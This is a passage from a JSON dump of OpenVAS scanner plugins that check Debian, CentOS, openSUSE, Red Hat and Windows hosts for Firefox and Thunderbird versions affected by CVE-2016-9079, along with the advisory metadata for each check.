isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"45.5.1esr-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:30", "description": "Check the version of firefox", "cvss3": {}, "published": "2016-12-04T00:00:00", "type": "openvas", "title": "CentOS Update for firefox CESA-2016:2843 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882606", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882606", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2016:2843 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882606\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-04 05:41:58 +0100 (Sun, 04 Dec 2016)\");\n script_cve_id(\"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for firefox CESA-2016:2843 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es):\n\n * A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2843\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-December/022167.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.5.1~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:18", "description": "Check the version of firefox", "cvss3": {}, "published": "2016-12-04T00:00:00", "type": "openvas", "title": "CentOS Update for firefox CESA-2016:2843 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882605", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882605", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2016:2843 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882605\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-04 05:41:55 +0100 (Sun, 04 Dec 2016)\");\n script_cve_id(\"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for firefox CESA-2016:2843 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es):\n\n * A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2843\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-December/022168.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.5.1~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:08", "description": "Check the version of thunderbird", "cvss3": {}, "published": "2016-12-08T00:00:00", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2016:2850 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882608", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2016:2850 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882608\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 05:33:23 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for thunderbird CESA-2016:2850 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail\nand newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es):\n\n * A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2850\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-December/022170.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~45.5.1~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:35:22", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-05T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Mozilla (openSUSE-SU-2016:2991-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851440", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851440", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851440\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 05:42:54 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Mozilla (openSUSE-SU-2016:2991-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Mozilla'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update contains Mozilla Thunderbird 45.5.1 and fixes one\n vulnerability.\n\n In Mozilla Thunderbird, this vulnerability may be exploited when used in a\n browser-like context.\n\n - CVE-2016-9079: SVG Animation Remote Code Execution (MFSA 2016-92,\n bsc#1012964, bmo#1321066)\");\n\n script_tag(name:\"affected\", value:\"Mozilla on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2991-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird\", rpm:\"MozillaThunderbird~45.5.1~55.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-buildsymbols\", rpm:\"MozillaThunderbird-buildsymbols~45.5.1~55.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debuginfo\", rpm:\"MozillaThunderbird-debuginfo~45.5.1~55.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-debugsource\", rpm:\"MozillaThunderbird-debugsource~45.5.1~55.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-devel\", rpm:\"MozillaThunderbird-devel~45.5.1~55.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-common\", rpm:\"MozillaThunderbird-translations-common~45.5.1~55.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaThunderbird-translations-other\", rpm:\"MozillaThunderbird-translations-other~45.5.1~55.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:17", "description": "This host is installed with Mozilla\n Thunderbird and is prone to denial of service vulnerability.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Mozilla Thunderbird Security Updates( mfsa_2016-92_2016-92 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2018-11-12T00:00:00", "id": "OPENVAS:1361412562310809828", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809828", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mozilla_thunderbird_mfsa_2016-92_2016-92_win.nasl 12313 2018-11-12 08:53:51Z asteins $\n#\n# Mozilla Thunderbird Security Updates( mfsa_2016-92_2016-92 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809828\");\n script_version(\"$Revision: 12313 $\");\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-12 09:53:51 +0100 (Mon, 12 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 13:38:43 +0530 (Thu, 01 Dec 2016)\");\n script_name(\"Mozilla Thunderbird Security Updates( mfsa_2016-92_2016-92 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to,\n Use-after-free in SVG Animation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to cause a denial of service via application crash,\n or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird version before\n 45.5.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version 45.5.1\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_thunderbird_detect_portable_win.nasl\");\n script_mandatory_keys(\"Thunderbird/Win/Ver\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!tbVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:tbVer, test_version:\"45.5.1\"))\n{\n report = report_fixed_ver(installed_version:tbVer, fixed_version:\"45.5.1\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-05T00:00:00", "type": "openvas", "title": "RedHat Update for thunderbird RHSA-2016:2850-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871726", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871726", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for thunderbird RHSA-2016:2850-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871726\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 09:52:36 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for thunderbird RHSA-2016:2850-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail\nand newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es):\n\n * A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\");\n script_tag(name:\"affected\", value:\"thunderbird on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2850-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-December/msg00004.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~45.5.1~1.el6_8\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"thunderbird-debuginfo\", rpm:\"thunderbird-debuginfo~45.5.1~1.el6_8\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-19T22:11:03", "description": "This host is installed with\n Mozilla Firefox Esr and is prone to denial of service vulnerability.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Mozilla Firefox Esr Security Updates( mfsa_2016-92_2016-92 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310809826", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809826", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Esr Security Updates( mfsa_2016-92_2016-92 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809826\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 12:34:20 +0530 (Thu, 01 Dec 2016)\");\n script_name(\"Mozilla Firefox Esr Security Updates( mfsa_2016-92_2016-92 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox Esr and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to,\n Use-after-free in SVG Animation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to cause a denial of service via application crash,\n or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox Esr version before\n 45.5.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox Esr version 45.5.1\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n 